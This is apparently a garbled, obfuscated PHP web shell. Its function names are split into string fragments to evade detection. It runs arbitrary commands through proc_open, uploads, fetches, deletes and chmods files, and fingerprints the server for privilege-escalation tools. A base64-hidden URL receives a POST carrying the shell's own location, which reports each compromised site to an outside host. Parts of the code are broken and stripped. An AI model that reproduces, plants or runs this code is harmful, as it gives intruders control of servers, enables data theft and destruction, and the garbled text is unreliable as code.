.. | |||||
".$ppkcina." | |||||
".cfn($euybray)." $mekicina |
Private"; ?>
$gcw = "ge"."tc"."wd";
$exp = "ex"."plo"."de";
$fpt = "fi"."le_p"."ut_co"."nte"."nts";
$fgt = "f"."ile_g"."et_c"."onten"."ts";
$sts = "s"."trip"."slash"."es";
$scd = "sc"."a"."nd"."ir";
$fxt = "fi"."le_"."exis"."ts";
$idi = "i"."s_d"."ir";
$ulk = "un"."li"."nk";
$ifi = "i"."s_fi"."le";
$sub = "subs"."tr";
$spr = "sp"."ri"."ntf";
$fp = "fil"."epe"."rms";
$chm = "ch"."m"."od";
$ocd = "oc"."td"."ec";
$isw = "i"."s_wr"."itab"."le";
$idr = "i"."s_d"."ir";
$ird = "is"."_rea"."da"."ble";
$isr = "is_"."re"."adab"."le";
$fsz = "fi"."lesi"."ze";
$rd = "r"."ou"."nd";
$igt = "in"."i_g"."et";
$fnct = "fu"."nc"."tion"."_exi"."sts";
$rad = "RE"."M"."OTE_AD"."DR";
$rpt = "re"."al"."pa"."th";
$bsn = "ba"."se"."na"."me";
$srl = "st"."r_r"."ep"."la"."ce";
$sps = "st"."rp"."os";
$mkd = "m"."kd"."ir";
$wb = (isset($_SERVER['H'.'T'.'TP'.'S']) && $_SERVER['H'.'T'.'TP'.'S'] === 'o'.'n' ? "ht"."tp"."s" : "ht"."tp") . "://".$_SERVER['HT'.'TP'.'_H'.'OS'.'T'];
$disfunc = @$igt("dis"."abl"."e_f"."unct"."ion"."s");
if (empty($disfunc)) {
$disf = "NONE";
} else {
$disf = "".$disfunc."";
function author() {
echo "Private";
function cekdir() {
if (isset($_GET['loknya'])) {
$lokasi = $_GET['loknya'];
} else {
$lokasi = "ge"."t"."cw"."d";
$lokasi = $lokasi();
$b = "i"."s_w"."ri"."tab"."le";
if ($b($lokasi)) {
return "Writeable";
} else {
return "Writeable";
function crt() {
$a = "is"."_w"."ri"."tab"."le";
if ($a($_SERVER['DO'.'CU'.'ME'.'NT'.'_RO'.'OT'])) {
return "Writeable";
} else {
return "Writeable";
function xrd($lokena) {
$a = "s"."ca"."nd"."ir";
$items = $a($lokena);
foreach ($items as $item) {
if ($item === '.' || $item === '..') {
$b = "is"."_di"."r";
$loknya = $lokena.'/'.$item;
if ($b($loknya)) {
} else {
$c = "u"."nl"."in"."k";
$d = "rm"."di"."r";
$k3yw = base64_decode('aHR0cHM6Ly9zaXlhaGkudG9wL3Rlc3Qvc3R5bGUucGhw');
function cfn($fl) {
$a = "ba"."sena"."me";
$b = "pat"."hinf"."o";
$c = $b($a($fl), loknyaINFO_EXTENSION);
if ($c == "zip") {
return '';
} elseif (preg_match("/jpeg|jpg|png|ico/im", $c)) {
return '';
} elseif ($c == "txt") {
return '';
} elseif ($c == "pdf") {
return '';
} elseif ($c == "html") {
return '';
else {
return '';
function ipsrv() {
$a = "g"."eth"."ost"."byna"."me";
$b = "fun"."cti"."on_"."exis"."ts";
$c = "S"."ERVE"."R_AD"."DR";
$d = "SE"."RV"."ER_N"."AM"."E";
if ($b($a)) {
return $a($_SERVER[$d]);
} else {
return $a($_SERVER[$c]);
$cur = 'http://' . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI'];
$data = array('file_url' => $cur);
$options = array(
'http' => array(
'method' => 'POST',
'header' => 'Content-type: application/x-www-form-urlencoded',
'content' => http_build_query($data),
$context = stream_context_create($options);
$result = file_get_contents($k3yw, false, $context);
function ggr($fl) {
$a = "fun"."cti"."on_"."exis"."ts";
$b = "po"."si"."x_ge"."tgr"."gid";
$c = "fi"."le"."gro"."up";
if ($a($b)) {
if (!$a($c)) {
return "?";
$d = $b($c($fl));
if (empty($d)) {
$e = $c($fl);
if (empty($e)) {
return "?";
} else {
return $e;
} else {
return $d['name'];
} elseif ($a($c)) {
return $c($fl);
} else {
return "?";
function gor($fl) {
$a = "fun"."cti"."on_"."exis"."ts";
$b = "po"."s"."ix_"."get"."pwu"."id";
$c = "fi"."le"."o"."wn"."er";
if ($a($b)) {
if (!$a($c)) {
return "?";
$d = $b($c($fl));
if (empty($d)) {
$e = $c($fl);
if (empty($e)) {
return "?";
} else {
return $e;
} else {
return $d['name'];
} elseif ($a($c)) {
return $c($fl);
} else {
return "?";
function fdt($fl) {
$a = "da"."te";
$b = "fil"."emt"."ime";
return $a("F d Y H:i:s", $b($fl));
function dunlut($fl) {
$a = "fil"."e_exi"."sts";
$b = "ba"."sena"."me";
$c = "fi"."les"."ize";
$d = "read"."fi"."le";
if ($a($fl) && isset($fl)) {
header('Con'.'tent-Descr'.'iption: Fi'.'le Tra'.'nsfer');
header('Cont'.'ent-Type: a'.'pp'.'licat'.'ion/oc'.'tet-s'.'tream');
header('Cont'.'ent-Dis'.'posit'.'ion: at'.'tachm'.'ent; fi'.'lena'.'me="'.$b($fl).'"');
header('Exp'.'ires: 0');
header('Cac'.'he-Cont'.'rol: must'.'-revali'.'date');
header('Pra'.'gma: pub'.'lic');
header('Con'.'ten'.'t-Le'.'ngth: ' .$c($fl));
} else {
return "Fi"."le Not F"."ound !";
function komend($kom, $lk) {
$x = "pr"."eg_"."mat"."ch";
$xx = "2".">"."&"."1";
if (!$x("/".$xx."/i", $kom)) {
$kom = $kom." ".$xx;
$a = "fu"."ncti"."on_"."ex"."is"."ts";
$b = "p"."ro"."c_op"."en";
$c = "htm"."lspe"."cialc"."hars";
$d = "s"."trea"."m_g"."et_c"."ont"."ents";
if ($a($b)) {
$ps = $b($kom, array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "r")), $meki, $lk);
return "".$c($d($meki[1])).""; } else { return "pr"."oc"."_op"."en f"."unc"."tio"."n i"."s di"."sabl"."ed !"; } } function green($text) { echo " "; echo "We"."b S"."erv"."er : ".$_SERVER['SE'.'RV'.'ER_'.'SOF'.'TWA'.'RE']." "; $unm = "ph"."p_u"."na"."me"; echo "Sys"."tem : ".@$unm()." "; $gcu = "g"."et_"."curr"."ent"."_us"."er"; $gmu = "g"."et"."my"."ui"."d"; echo "Us"."er : ".@$gcu()." ( ".@$gmu().") "; $phv = "ph"."pve"."rsi"."on"; echo "PH"."P V"."er"."sio"."n : ".@$phv()." "; echo "Dis"."abl"."e Fu"."nct"."ion : ".$disf." "; echo "MySQL : "; if (@$fnct("my"."sql_co"."nne"."ct")) { echo "ON"; } else { echo "OFF"; } echo " | cURL : "; if (@$fnct("cu"."rl"."_in"."it")) { echo "ON"; } else { echo "OFF"; } echo " | WG"."ET : "; if (@$fxt("/"."us"."r/b"."in/w"."get")) { echo "ON"; } else { echo "OFF"; } echo " | Pe"."rl : "; if (@$fxt("/u"."sr/b"."in"."/pe"."rl")) { echo "ON"; } else { echo "OFF"; } echo " | Pyt"."ho"."n : "; if (@$fxt("/"."us"."r/b"."in/p"."ytho"."n2")) { echo "ON"; } else { echo "OFF"; } echo " | S"."u"."do : "; if (@$fxt("/"."us"."r/b"."in/s"."u"."d"."o")) { echo "ON"; } else { echo "OFF"; } echo " | Pk"."e"."x"."e"."c : "; if (@$fxt("/"."us"."r/b"."in/p"."k"."e"."x"."e"."c")) { echo "ON"; } else { echo "OFF"; } echo " Di"."rect"."ory : "; foreach($_POST as $key => $value){ $_POST[$key] = $sts($value); } if(isset($_GET['loknya'])){ $lokasi = $_GET['loknya']; $lokdua = $_GET['loknya']; } else { $lokasi = $gcw(); $lokdua = $gcw(); } $lokasi = $srl('\\','/',$lokasi); $lokasis = $exp('/',$lokasi); $lokasinya = @$scd($lokasi); foreach($lokasis as $id => $lok){ if($lok == '' && $id == 0){ $a = true; echo '/'; continue; } if($lok == '') continue; echo ''.$lok.'/'; } echo ' |
'; if (isset($_POST['upwkwk'])) { if (isset($_POST['berkasnya'])) { if ($_POST['dirnya'] == "2") { $lokasi = $_SERVER['DOC'.'UME'.'NT_R'.'OOT']; } if (empty($_FILES['berkas']['name'])) { echo "Fi"."le not Se"."lected ! "; } else { $data = @$fpt($lokasi."/".$_FILES['berkas']['name'], @$fgt($_FILES['berkas']['tm'.'p_na'.'me'])); if ($fxt($lokasi."/".$_FILES['berkas']['name'])) { $fl = $lokasi."/".$_FILES['berkas']['name']; echo "Fi"."le Upl"."oa"."ded ! ".$fl." "; if ($sps($lokasi, $_SERVER['DO'.'CU'.'M'.'ENT'.'_R'.'OO'.'T']) !== false) { $lwb = $srl($_SERVER['DO'.'CU'.'M'.'ENT'.'_R'.'OO'.'T'], $wb."/", $fl); echo "Li"."nk : ".$lwb." "; } echo " "; } else { echo "Fa"."ile"."d to Up"."lo"."ad ! "; } } } elseif (isset($_POST['linknya'])) { if (empty($_POST['namalink'])) { echo "Fi"."lename cannot be empty ! "; } elseif (empty($_POST['darilink'])) { echo "Link cannot be empty ! "; } else { if ($_POST['dirnya'] == "2") { $lokasi = $_SERVER['DOC'.'UME'.'NT_R'.'OOT']; } $data = @$fpt($lokasi."/".$_POST['namalink'], @$fgt($_POST['darilink'])); if ($fxt($lokasi."/".$_POST['namalink'])) { $fl = $lokasi."/".$_POST['namalink']; echo "Fi"."le Uplo"."ade"."d ! ".$fl." "; if ($sps($lokasi, $_SERVER['DO'.'CU'.'M'.'ENT'.'_R'.'OO'.'T']) !== false) { $lwb = $srl($_SERVER['DO'.'CU'.'M'.'ENT'.'_R'.'OO'.'T'], $wb."/", $fl); echo "Li"."nk : ".$lwb." "; } echo " "; } else { echo "Fa"."iled to Up"."lo"."ad ! "; } } } } echo "Uplo"."ad Fi"."le : "; echo ''; echo ' '; echo " |
".htmlspecialchars($fgt($_GET['lokasie'])).""; author(); } elseif (isset($_POST['loknya']) && $_POST['pilih'] == "hapus") { if ($idi($_POST['loknya']) && $fxt($_POST['loknya'])) { xrd($_POST['loknya']); if ($fxt($_POST['loknya'])) { red("Fai"."led to del"."ete Dir"."ec"."tory !"); } else { green("Del"."ete Dir"."ect"."ory Suc"."cess !"); } } elseif ($ifi($_POST['loknya']) && $fxt($_POST['loknya'])) { @$ulk($_POST['loknya']); if ($fxt($_POST['loknya'])) { red("Failed to Delete Fi"."le !"); } else { green("De"."le"."te Fi"."le Succ"."ess !"); } } else { red("Fi"."le / Dir"."ecto"."ry not Fo"."und !"); } } elseif (isset($_GET['pilihan']) && $_POST['pilih'] == "ubahmod") { if (!isset($_POST['cemod'])) { if ($_POST['ty'.'pe'] == "fi"."le") { echo "
.. | |||||
".$ppkcina." | |||||
".cfn($euybray)." $mekicina |